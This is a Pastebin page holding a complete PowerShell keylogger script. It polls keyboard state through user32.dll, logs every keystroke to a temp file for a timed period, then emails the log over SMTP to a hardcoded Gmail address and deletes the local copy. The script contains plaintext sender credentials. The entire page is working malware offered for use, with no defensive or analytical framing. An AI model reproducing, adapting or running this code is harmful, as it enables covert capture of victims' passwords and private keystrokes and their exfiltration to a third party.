SHARE
TWEET

Untitled

gkseldridge Nov 15th, 2019 (edited) 98 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Edit only this section!
  2. $TimesToRun = 1
  3. $RunTimeP = 20
  4. $From = "billyj@usa.com"
  5. $Pass = "cheese123"
  6. $To = "gkseldridge@gmail.com"
  7. $Subject = "Keylogger Results"
  8. $body = "Keylogger Results"
  9. $SMTPServer = "smtp.mail.com"
  10. $SMTPPort = "587"
  11. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
  12. ############################
  13.  
  14.  
  15. $TimeStart = Get-Date
  16. $TimeEnd = $timeStart.addminutes($RunTimeP)
  17.  
  18. #requires -Version 2
  19. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
  20. {
  21.   # Signatures for API Calls
  22.   $signatures = @'
  23. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  24. public static extern short GetAsyncKeyState(int virtualKeyCode);
  25. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  26. public static extern int GetKeyboardState(byte[] keystate);
  27. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  28. public static extern int MapVirtualKey(uint uCode, int uMapType);
  29. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  30. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  31. '@
  32.  
  33.   # load signatures and make members available
  34.   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  35.    
  36.   # create output file
  37.   $null = New-Item -Path $Path -ItemType File -Force
  38.  
  39.   try
  40.   {
  41.  
  42.     # create endless loop. When user presses CTRL+C, finally-block
  43.     # executes and shows the collected key presses
  44.     $Runner = 0
  45.     while ($TimesToRun  -ge $Runner) {
  46.     while ($TimeEnd -ge $TimeNow) {
  47.       Start-Sleep -Milliseconds 40
  48.      
  49.       # scan all ASCII codes above 8
  50.       for ($ascii = 9; $ascii -le 254; $ascii++) {
  51.         # get current key state
  52.         $state = $API::GetAsyncKeyState($ascii)
  53.  
  54.         # is key pressed?
  55.         if ($state -eq -32767) {
  56.           $null = [console]::CapsLock
  57.  
  58.           # translate scan code to real code
  59.           $virtualKey = $API::MapVirtualKey($ascii, 3)
  60.  
  61.           # get keyboard state for virtual keys
  62.           $kbstate = New-Object Byte[] 256
  63.           $checkkbstate = $API::GetKeyboardState($kbstate)
  64.  
  65.           # prepare a StringBuilder to receive input key
  66.           $mychar = New-Object -TypeName System.Text.StringBuilder
  67.  
  68.           # translate virtual key
  69.           $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  70.  
  71.           if ($success)
  72.           {
  73.             # add key to logger file
  74.             [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  75.           }
  76.         }
  77.       }
  78.       $TimeNow = Get-Date
  79.     }
  80.     send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
  81.     Remove-Item -Path $Path -force
  82.     }
  83.   }
  84.   finally
  85.   {
  86.     # open logger file in Notepad
  87.     exit 1
  88.   }
  89. }
  90.  
  91. # records all key presses until script is aborted by pressing CTRL+C
  92. # will then open the file with collected key codes
  93. Start-KeyLogger
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top